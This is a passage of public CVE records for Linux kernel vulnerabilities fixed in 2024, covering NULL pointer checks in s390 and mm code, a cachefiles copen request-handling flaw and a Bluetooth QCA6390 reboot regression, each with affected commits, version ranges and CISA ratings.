              "lessThan": "f80bd8bb6f380bc265834c46058d38b34174813e",
              "status": "affected",
              "version": "6326c26c1514757242829b292b26eac589013200",
              "versionType": "git"
            },
            {
              "lessThan": "b5efb63acf7bddaf20eacfcac654c25c446eabe8",
              "status": "affected",
              "version": "6326c26c1514757242829b292b26eac589013200",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/s390/mm/pgalloc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.6"
            },
            {
              "lessThan": "6.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/mm: Add NULL pointer check to crst_table_free() base_crst_free()\n\ncrst_table_free() used to work with NULL pointers before the conversion\nto ptdescs.  Since crst_table_free() can be called with a NULL pointer\n(error handling in crst_table_upgrade() add an explicit check.\n\nAlso add the same check to base_crst_free() for consistency reasons.\n\nIn real life this should not happen, since order two GFP_KERNEL\nallocations will not fail, unless FAIL_PAGE_ALLOC is enabled and used."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:24:45.510Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/794fa52b94637d6b2e8c9474fbe3983af5c9f046"
        },
        {
          "url": "https://git.kernel.org/stable/c/f80bd8bb6f380bc265834c46058d38b34174813e"
        },
        {
          "url": "https://git.kernel.org/stable/c/b5efb63acf7bddaf20eacfcac654c25c446eabe8"
        }
      ],
      "title": "s390/mm: Add NULL pointer check to crst_table_free() base_crst_free()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42235",
    "datePublished": "2024-08-07T15:14:25.070Z",
    "dateReserved": "2024-07-30T07:40:12.252Z",
    "dateUpdated": "2025-05-04T09:24:45.510Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-41055 (GCVE-0-2024-41055)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:32 – Updated: 2025-11-03 21:59

Title

mm: prevent derefencing NULL ptr in pfn_section_valid()

Summary

In the Linux kernel, the following vulnerability has been resolved: mm: prevent derefencing NULL ptr in pfn_section_valid() Commit 5ec8e8ea8b77 ("mm/sparsemem: fix race in accessing memory_section->usage") changed pfn_section_valid() to add a READ_ONCE() call around "ms->usage" to fix a race with section_deactivate() where ms->usage can be cleared. The READ_ONCE() call, by itself, is not enough to prevent NULL pointer dereference. We need to check its value before dereferencing it.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0100aeb8a12d51950…
	https://git.kernel.org/stable/c/bc17f2377818dca64…
	https://git.kernel.org/stable/c/941e816185661bf2b…
	https://git.kernel.org/stable/c/797323d1cf92d09b7…
	https://git.kernel.org/stable/c/adccdf702b4ea913d…
	https://git.kernel.org/stable/c/82f0b6f041fad768c…

Impacted products

Vendor

Product

Version

Linux

Affected: 90ad17575d26874287271127d43ef3c2af876cea , < 0100aeb8a12d51950418e685f879cc80cb8e5982 (git)
Affected: b448de2459b6d62a53892487ab18b7d823ff0529 , < bc17f2377818dca643a74499c3f5333500c90503 (git)
Affected: 68ed9e33324021e9d6b798e9db00ca3093d2012a , < 941e816185661bf2b44b488565d09444ae316509 (git)
Affected: 70064241f2229f7ba7b9599a98f68d9142e81a97 , < 797323d1cf92d09b7a017cfec576d9babf99cde7 (git)
Affected: 5ec8e8ea8b7783fab150cf86404fc38cb4db8800 , < adccdf702b4ea913ded5ff512239e382d7473b63 (git)
Affected: 5ec8e8ea8b7783fab150cf86404fc38cb4db8800 , < 82f0b6f041fad768c28b4ad05a683065412c226e (git)
Affected: 3a01daace71b521563c38bbbf874e14c3e58adb7 (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.100 , ≤ 6.1.* (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:59:54.292Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0100aeb8a12d51950418e685f879cc80cb8e5982"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bc17f2377818dca643a74499c3f5333500c90503"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/941e816185661bf2b44b488565d09444ae316509"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/797323d1cf92d09b7a017cfec576d9babf99cde7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/adccdf702b4ea913ded5ff512239e382d7473b63"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/82f0b6f041fad768c28b4ad05a683065412c226e"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41055",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:22:28.194623Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:01.312Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "include/linux/mmzone.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0100aeb8a12d51950418e685f879cc80cb8e5982",
              "status": "affected",
              "version": "90ad17575d26874287271127d43ef3c2af876cea",
              "versionType": "git"
            },
            {
              "lessThan": "bc17f2377818dca643a74499c3f5333500c90503",
              "status": "affected",
              "version": "b448de2459b6d62a53892487ab18b7d823ff0529",
              "versionType": "git"
            },
            {
              "lessThan": "941e816185661bf2b44b488565d09444ae316509",
              "status": "affected",
              "version": "68ed9e33324021e9d6b798e9db00ca3093d2012a",
              "versionType": "git"
            },
            {
              "lessThan": "797323d1cf92d09b7a017cfec576d9babf99cde7",
              "status": "affected",
              "version": "70064241f2229f7ba7b9599a98f68d9142e81a97",
              "versionType": "git"
            },
            {
              "lessThan": "adccdf702b4ea913ded5ff512239e382d7473b63",
              "status": "affected",
              "version": "5ec8e8ea8b7783fab150cf86404fc38cb4db8800",
              "versionType": "git"
            },
            {
              "lessThan": "82f0b6f041fad768c28b4ad05a683065412c226e",
              "status": "affected",
              "version": "5ec8e8ea8b7783fab150cf86404fc38cb4db8800",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "3a01daace71b521563c38bbbf874e14c3e58adb7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "include/linux/mmzone.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.100",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "5.10.210",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "5.15.149",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.100",
                  "versionStartIncluding": "6.1.76",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "6.6.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.7.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm: prevent derefencing NULL ptr in pfn_section_valid()\n\nCommit 5ec8e8ea8b77 (\"mm/sparsemem: fix race in accessing\nmemory_section-\u003eusage\") changed pfn_section_valid() to add a READ_ONCE()\ncall around \"ms-\u003eusage\" to fix a race with section_deactivate() where\nms-\u003eusage can be cleared.  The READ_ONCE() call, by itself, is not enough\nto prevent NULL pointer dereference.  We need to check its value before\ndereferencing it."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:33.295Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0100aeb8a12d51950418e685f879cc80cb8e5982"
        },
        {
          "url": "https://git.kernel.org/stable/c/bc17f2377818dca643a74499c3f5333500c90503"
        },
        {
          "url": "https://git.kernel.org/stable/c/941e816185661bf2b44b488565d09444ae316509"
        },
        {
          "url": "https://git.kernel.org/stable/c/797323d1cf92d09b7a017cfec576d9babf99cde7"
        },
        {
          "url": "https://git.kernel.org/stable/c/adccdf702b4ea913ded5ff512239e382d7473b63"
        },
        {
          "url": "https://git.kernel.org/stable/c/82f0b6f041fad768c28b4ad05a683065412c226e"
        }
      ],
      "title": "mm: prevent derefencing NULL ptr in pfn_section_valid()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41055",
    "datePublished": "2024-07-29T14:32:10.672Z",
    "dateReserved": "2024-07-12T12:17:45.627Z",
    "dateUpdated": "2025-11-03T21:59:54.292Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41074 (GCVE-0-2024-41074)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:57 – Updated: 2025-11-03 22:00

Title

cachefiles: Set object to close if ondemand_id < 0 in copen

Summary

In the Linux kernel, the following vulnerability has been resolved: cachefiles: Set object to close if ondemand_id < 0 in copen If copen is maliciously called in the user mode, it may delete the request corresponding to the random id. And the request may have not been read yet. Note that when the object is set to reopen, the open request will be done with the still reopen state in above case. As a result, the request corresponding to this object is always skipped in select_req function, so the read request is never completed and blocks other process. Fix this issue by simply set object to close if its id < 0 in copen.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/703bea37d13e4ccda…
	https://git.kernel.org/stable/c/c32ee78fbc670e6f9…
	https://git.kernel.org/stable/c/0845c553db11c84ff…
	https://git.kernel.org/stable/c/4f8703fb3482f92ed…

Impacted products

Vendor

Product

Version

Linux

Affected: c8383054506c77b814489c09877b5db83fd4abf2 , < 703bea37d13e4ccdafd17ae7c4cb583752ba7663 (git)
Affected: c8383054506c77b814489c09877b5db83fd4abf2 , < c32ee78fbc670e6f90989a45d340748e34cad333 (git)
Affected: c8383054506c77b814489c09877b5db83fd4abf2 , < 0845c553db11c84ff53fccd59da11b6d6ece4a60 (git)
Affected: c8383054506c77b814489c09877b5db83fd4abf2 , < 4f8703fb3482f92edcfd31661857b16fec89c2c0 (git)

Linux

Affected: 5.19
Unaffected: 0 , < 5.19 (semver)
Unaffected: 6.1.101 , ≤ 6.1.* (semver)
Unaffected: 6.6.42 , ≤ 6.6.* (semver)
Unaffected: 6.9.11 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:00:28.430Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/703bea37d13e4ccdafd17ae7c4cb583752ba7663"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c32ee78fbc670e6f90989a45d340748e34cad333"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0845c553db11c84ff53fccd59da11b6d6ece4a60"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4f8703fb3482f92edcfd31661857b16fec89c2c0"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41074",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:21:27.454112Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:00.299Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/cachefiles/ondemand.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "703bea37d13e4ccdafd17ae7c4cb583752ba7663",
              "status": "affected",
              "version": "c8383054506c77b814489c09877b5db83fd4abf2",
              "versionType": "git"
            },
            {
              "lessThan": "c32ee78fbc670e6f90989a45d340748e34cad333",
              "status": "affected",
              "version": "c8383054506c77b814489c09877b5db83fd4abf2",
              "versionType": "git"
            },
            {
              "lessThan": "0845c553db11c84ff53fccd59da11b6d6ece4a60",
              "status": "affected",
              "version": "c8383054506c77b814489c09877b5db83fd4abf2",
              "versionType": "git"
            },
            {
              "lessThan": "4f8703fb3482f92edcfd31661857b16fec89c2c0",
              "status": "affected",
              "version": "c8383054506c77b814489c09877b5db83fd4abf2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/cachefiles/ondemand.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.19"
            },
            {
              "lessThan": "5.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.101",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.42",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.101",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.42",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.11",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncachefiles: Set object to close if ondemand_id \u003c 0 in copen\n\nIf copen is maliciously called in the user mode, it may delete the request\ncorresponding to the random id. And the request may have not been read yet.\n\nNote that when the object is set to reopen, the open request will be done\nwith the still reopen state in above case. As a result, the request\ncorresponding to this object is always skipped in select_req function, so\nthe read request is never completed and blocks other process.\n\nFix this issue by simply set object to close if its id \u003c 0 in copen."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-21T09:12:53.947Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/703bea37d13e4ccdafd17ae7c4cb583752ba7663"
        },
        {
          "url": "https://git.kernel.org/stable/c/c32ee78fbc670e6f90989a45d340748e34cad333"
        },
        {
          "url": "https://git.kernel.org/stable/c/0845c553db11c84ff53fccd59da11b6d6ece4a60"
        },
        {
          "url": "https://git.kernel.org/stable/c/4f8703fb3482f92edcfd31661857b16fec89c2c0"
        }
      ],
      "title": "cachefiles: Set object to close if ondemand_id \u003c 0 in copen",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41074",
    "datePublished": "2024-07-29T14:57:33.976Z",
    "dateReserved": "2024-07-12T12:17:45.631Z",
    "dateUpdated": "2025-11-03T22:00:28.430Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42137 (GCVE-0-2024-42137)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-11-03 22:02

Title

Bluetooth: qca: Fix BT enable failure again for QCA6390 after warm reboot

Summary

In the Linux kernel, the following vulnerability has been resolved: Bluetooth: qca: Fix BT enable failure again for QCA6390 after warm reboot Commit 272970be3dab ("Bluetooth: hci_qca: Fix driver shutdown on closed serdev") will cause below regression issue: BT can't be enabled after below steps: cold boot -> enable BT -> disable BT -> warm reboot -> BT enable failure if property enable-gpios is not configured within DT|ACPI for QCA6390. The commit is to fix a use-after-free issue within qca_serdev_shutdown() by adding condition to avoid the serdev is flushed or wrote after closed but also introduces this regression issue regarding above steps since the VSC is not sent to reset controller during warm reboot. Fixed by sending the VSC to reset controller within qca_serdev_shutdown() once BT was ever enabled, and the use-after-free issue is also fixed by this change since the serdev is still opened before it is flushed or wrote. Verified by the reported machine Dell XPS 13 9310 laptop over below two kernel commits: commit e00fc2700a3f ("Bluetooth: btusb: Fix triggering coredump implementation for QCA") of bluetooth-next tree. commit b23d98d46d28 ("Bluetooth: btusb: Fix triggering coredump implementation for QCA") of linus mainline tree.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/215a26c2404fa3462…
	https://git.kernel.org/stable/c/4ca6013cd18e58ac1…
	https://git.kernel.org/stable/c/e6e200b264271f62a…
	https://git.kernel.org/stable/c/e2d8aa4c763593704…
	https://git.kernel.org/stable/c/977b9dc65e14fb80d…
	https://git.kernel.org/stable/c/88e72239ead9814b8…

Impacted products

Vendor

Product

Version

Linux

Affected: e84ec6e25df9bb0968599e92eacedaf3a0a5b587 , < 215a26c2404fa34625c725d446967fa328a703eb (git)
Affected: 908d1742b6e694e84ead5c62e4b7c1bfbb8b46a3 , < 4ca6013cd18e58ac1044908c40d4006a92093a11 (git)
Affected: ea3ebda47dd56f6e1c62f2e0e1b6e1b0a973e447 , < e6e200b264271f62a3fadb51ada9423015ece37b (git)
Affected: 272970be3dabd24cbe50e393ffee8f04aec3b9a8 , < e2d8aa4c763593704ac21e7591aed4f13e32f3b5 (git)
Affected: 272970be3dabd24cbe50e393ffee8f04aec3b9a8 , < 977b9dc65e14fb80de4763d949c7dec2ecb15b9b (git)
Affected: 272970be3dabd24cbe50e393ffee8f04aec3b9a8 , < 88e72239ead9814b886db54fc4ee39ef3c2b8f26 (git)

Linux

Affected: 6.2
Unaffected: 0 , < 6.2 (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:05.374Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/215a26c2404fa34625c725d446967fa328a703eb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4ca6013cd18e58ac1044908c40d4006a92093a11"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e6e200b264271f62a3fadb51ada9423015ece37b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e2d8aa4c763593704ac21e7591aed4f13e32f3b5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/977b9dc65e14fb80de4763d949c7dec2ecb15b9b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/88e72239ead9814b886db54fc4ee39ef3c2b8f26"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42137",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:16:06.425192Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:35.827Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/bluetooth/hci_qca.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "215a26c2404fa34625c725d446967fa328a703eb",
              "status": "affected",
              "version": "e84ec6e25df9bb0968599e92eacedaf3a0a5b587",
              "versionType": "git"
            },
            {
              "lessThan": "4ca6013cd18e58ac1044908c40d4006a92093a11",
              "status": "affected",
              "version": "908d1742b6e694e84ead5c62e4b7c1bfbb8b46a3",
              "versionType": "git"
            },
            {
              "lessThan": "e6e200b264271f62a3fadb51ada9423015ece37b",
              "status": "affected",
              "version": "ea3ebda47dd56f6e1c62f2e0e1b6e1b0a973e447",
              "versionType": "git"
            },
            {
              "lessThan": "e2d8aa4c763593704ac21e7591aed4f13e32f3b5",
              "status": "affected",
              "version": "272970be3dabd24cbe50e393ffee8f04aec3b9a8",
              "versionType": "git"
            },
            {
              "lessThan": "977b9dc65e14fb80de4763d949c7dec2ecb15b9b",
              "status": "affected",
              "version": "272970be3dabd24cbe50e393ffee8f04aec3b9a8",
              "versionType": "git"
            },
            {
              "lessThan": "88e72239ead9814b886db54fc4ee39ef3c2b8f26",
              "status": "affected",
              "version": "272970be3dabd24cbe50e393ffee8f04aec3b9a8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/bluetooth/hci_qca.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.2"
            },
            {
              "lessThan": "6.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "5.10.165",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "5.15.90",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "6.1.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "6.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "6.2",
                  "vulnerable": true
                },
                {
